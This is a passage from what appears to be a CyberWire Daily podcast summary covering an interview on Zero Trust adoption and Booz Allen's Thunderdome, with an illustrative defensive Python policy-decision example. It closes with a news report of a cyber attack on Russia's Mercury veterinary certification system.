Broader Application: Zero Trust principles are now being adapted to protect critical infrastructure and weapon systems from cyber threats.
Tailored Solutions: Implementing Zero Trust in OT and defense environments requires customized approaches, differing from traditional IT networks.
Challenges in Implementing Zero Trust
Timestamp: 14:33 - 15:34
Umar identifies the primary challenge in Zero Trust implementation as the data pillar:
Governance and Policies: Establishing standards for data tagging, labeling, and sharing is more challenging than technological implementations.
Non-Technical Barriers: The difficulties lie in governance frameworks rather than in the technology itself, particularly in managing data access and protection policies.
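Why the data pillar is a governance problem first: a policy engine can only make per-request decisions on data that carries a label, so the label vocabulary, who assigns it, and the rule that unlabeled data is denied have to exist before any product is switched on. The policy decision point below is an added illustration of that dependency; it is not Booz Allen's or Thunderdome's code, and the labels, clearance levels, device-posture fields and sample subjects and resources are constructed.

```python
"""A minimal Zero Trust policy decision point whose answer depends on data labels."""
from __future__ import annotations
from dataclasses import dataclass

# The label vocabulary is the governance decision: who defines these, who may
# apply them, and the rule that every object carries exactly one.
LABELS = {"public": 0, "internal": 1, "confidential": 2, "restricted": 3}


@dataclass(frozen=True)
class Subject:
    user: str
    clearance: str                 # highest label this identity may read
    mfa: bool                      # identity-pillar signal from the IdP
    device_managed: bool           # device-pillar signals from endpoint management
    device_patched: bool
    groups: frozenset[str] = frozenset()


@dataclass(frozen=True)
class Resource:
    name: str
    label: str | None              # None models data nobody has tagged yet
    need_to_know: frozenset[str] = frozenset()   # empty = any sufficiently cleared user


def decide(s: Subject, r: Resource, action: str = "read") -> tuple[bool, list[str]]:
    """Return (allow, reasons). This runs per request, not once at login, so a
    revoked MFA claim or a device that falls out of compliance changes the answer."""
    if r.label is None:
        return False, ["unlabeled resource: deny by default"]
    if r.label not in LABELS or s.clearance not in LABELS:
        return False, ["unknown label or clearance"]
    reasons: list[str] = []
    level = LABELS[r.label]
    if level > LABELS[s.clearance]:
        reasons.append(f"clearance {s.clearance} below label {r.label}")
    if r.need_to_know and not (s.groups & r.need_to_know):
        reasons.append("not in a need-to-know group")
    if level >= LABELS["confidential"]:
        if not s.mfa:
            reasons.append("MFA required for confidential and above")
        if not s.device_managed:
            reasons.append("unmanaged device")
    if level >= LABELS["restricted"] and not s.device_patched:
        reasons.append("restricted data requires a patched device")
    if action == "write" and not s.device_managed:
        reasons.append("writes require a managed device")
    return (not reasons), reasons


def audit_event(s: Subject, r: Resource, action: str, allow: bool, reasons: list[str]) -> dict:
    """One structured record per decision. Every access produces one of these,
    which is where the data-volume problem for downstream analytics comes from."""
    return {"user": s.user, "resource": r.name, "label": r.label,
            "action": action, "allow": allow, "reasons": reasons}


# Constructed sample subjects and resources.
ALICE = Subject("alice", "restricted", mfa=True, device_managed=True, device_patched=True,
                groups=frozenset({"logistics"}))
ALICE_BYOD = Subject("alice", "restricted", mfa=True, device_managed=False, device_patched=True,
                     groups=frozenset({"logistics"}))
BOB = Subject("bob", "internal", mfa=False, device_managed=True, device_patched=True)
SCHEDULE = Resource("maintenance-schedule", "confidential", frozenset({"logistics"}))
UNTAGGED = Resource("legacy-export.csv", None)


def demo() -> list[dict]:
    events = []
    for s, r in [(ALICE, SCHEDULE), (ALICE_BYOD, SCHEDULE), (BOB, SCHEDULE), (ALICE, UNTAGGED)]:
        allow, reasons = decide(s, r)
        events.append(audit_event(s, r, "read", allow, reasons))
    return events


if __name__ == "__main__":
    for e in demo():
        print(e)
```

The last case is the governance point in one line: the most privileged user on a compliant device is still denied the untagged export, so tagging policy, not the engine, decides how much of the estate is usable under Zero Trust.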
Implementing Zero Trust in OT and Defense Systems
Timestamp: 15:50 - 17:16
Focusing on DoD and OT environments, Umar discusses:
Legacy Systems Vulnerability: Critical infrastructure often relies on outdated systems that are expensive and time-consuming to modernize.
Protective Measures: Emphasizing the need to safeguard critical assets and prevent intrusions into existing legacy systems.
Integration Challenges: Increased IT and OT integration introduces new vulnerabilities, necessitating comprehensive assessments and tailored security measures.
Thunderdome: A Modular Zero Trust Solution
Timestamp: 17:28 - 20:19
Imran Umar introduces Thunderdome, the Zero Trust solution Booz Allen Hamilton developed for the Defense Information Systems Agency (DISA) and the wider Department of Defense:
Features: Meets all 152 activities (target and advanced) in the DoD CIO's Zero Trust roadmap, supporting both unclassified and classified networks.
Architecture: Boasts an open and modular design, allowing for the integration and interchange of various products and solutions.
Scalability: Thunderdome's multi-tenant architecture enables efficient scaling and management across different domains, including tactical environments.
Flexibility and Customization
Timestamp: 20:41 - 23:53
Umar highlights Thunderdome’s adaptability:
Selective Deployment: Organizations can implement specific capabilities that align with their unique environments without adopting an all-or-nothing approach.
Comprehensive Solutions: Offers modules like Zero Trust Edge, Zero Trust Remote, application security stacks, and advanced visibility and analytics.
Recommendations for Zero Trust Adoption
Timestamp: 21:57 - 24:05
For organizations embarking on the Zero Trust journey, Umar recommends:
Conducting Maturity Assessments: Evaluate current capabilities across different pillars (user, identity, data) to identify gaps and prioritize implementations.
Starting with Identity: Establishing a robust identity solution is foundational, as it integrates seamlessly with other Zero Trust components.
Utilizing Thunderdome: Adopt Thunderdome’s turnkey solutions or engage in tailored deployments through the Zero Trust Accelerator program to streamline implementation.
Success Factors in Zero Trust Implementation
Timestamp: 24:05 - 24:56
Successful organizations typically:
Robust Identity Management: Have strong identity solutions and governance in place, facilitating the integration of additional Zero Trust capabilities.
Integrated Frameworks: Seamlessly incorporate various security measures, such as behavioral analytics and micro-segmentation, into their existing security infrastructure.
Emerging Considerations
Timestamp: 24:56 - 26:36
Umar warns of the challenges associated with data management in Zero Trust environments:
Data Volume: Implementing real-time dynamic access generates vast amounts of data, which traditional Security Information and Event Management (SIEM) systems struggle to handle.
Distributed Defense Architecture: Thunderdome employs a distributed cybersecurity operation model with AI-driven data pipelines, enabling real-time threat detection without overloading centralized systems.
Scalability: Transitioning to a distributed model is essential for managing the increased data flow and maintaining effective security analytics.
Cyber Attack on Russia's Mercury Veterinary Certification System
Timestamp: 27:00
A significant cyber attack has crippled Russia's dairy industry by targeting Mercury, the nation’s electronic veterinary certification system. This marks the third such strike on the platform within the year, with the current incident being the most severe. Key impacts include:
Operational Breakdown: Producers have resorted to paper-based certifications, but major retailers like Mirator and Yandex Lavka refuse to accept them due to legal requirements for digital documentation in handling animal products.
Supply Chain Disruption: The outage has led to empty shelves and widespread confusion, as the inability to issue legitimate digital certificates halts the distribution of dairy products.
Regulatory Response: The Soyuz Moloko dairy association criticizes unclear instructions from regulators, exacerbating the confusion.
Recovery Efforts: Restoration of the Mercury system is underway; however, there is no estimated timeline for full recovery, and the perpetrators remain unidentified.
This episode of CyberWire Daily sheds light on the escalating cyber tensions involving Iran, significant data breaches affecting governmental and healthcare institutions, advancements in Zero Trust security frameworks, and notable international cyber incidents disrupting essential industries. The comprehensive analysis underscores the pervasive and evolving nature of cyber threats in today's interconnected world.
For more detailed insights and daily updates, visit CyberWire Daily.